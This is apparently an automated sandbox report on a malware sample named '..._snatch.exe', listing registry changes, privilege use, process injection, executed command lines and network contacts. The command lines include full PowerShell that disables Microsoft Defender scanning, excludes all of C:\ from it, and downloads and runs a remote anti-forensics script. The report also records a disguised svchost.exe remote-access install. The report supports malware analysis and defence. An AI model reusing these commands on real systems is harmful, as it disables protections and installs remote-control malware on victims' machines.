Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1460 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1460 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1460 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1460 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3616 wrote to memory of 3976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3616 wrote to memory of 3976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3616 wrote to memory of 4048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3616 wrote to memory of 4048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1460 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 1460 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 4060 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 4060 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 4060 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 920 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 920 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 920 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2608 wrote to memory of 4400 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2608 wrote to memory of 4400 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2608 wrote to memory of 4400 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4072 wrote to memory of 4768 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4768 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4768 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4768 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4768 wrote to memory of 1824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4768 wrote to memory of 1824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4768 wrote to memory of 1824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4768 wrote to memory of 1824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1824 wrote to memory of 5024 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1824 wrote to memory of 5024 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1824 wrote to memory of 2316 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Local\svchost\svchost.exe
PID 1824 wrote to memory of 2316 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Local\svchost\svchost.exe
PID 116 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 116 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 116 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 116 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 116 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 116 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 116 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 116 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 116 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 116 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 116 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 116 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 116 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 116 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\System32\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c install.exe

C:\Users\Admin\AppData\Local\Temp\install.exe

install.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSIBBDE.tmp

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding E5BD01B1DB0AB92A5BB72FE44CC2ACEF C

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"

C:\Users\Admin\AppData\Local\svchost\svchost.exe

C:\Users\Admin\AppData\Local\svchost\svchost.exe -install

C:\Users\Admin\AppData\Local\svchost\svchost.exe

"C:\Users\Admin\AppData\Local\svchost\svchost.exe" --meshServiceName="Microsoft"

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -noprofile -nologo -command -

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.logflare.app udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 104.21.55.56:443 api.logflare.app tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 56.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 ubiquitous-cucurucho-343e97.netlify.app udp
DE 35.156.224.161:443 ubiquitous-cucurucho-343e97.netlify.app tcp
US 8.8.8.8:53 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev udp
US 104.21.55.56:443 api.logflare.app tcp
US 8.8.8.8:53 161.224.156.35.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
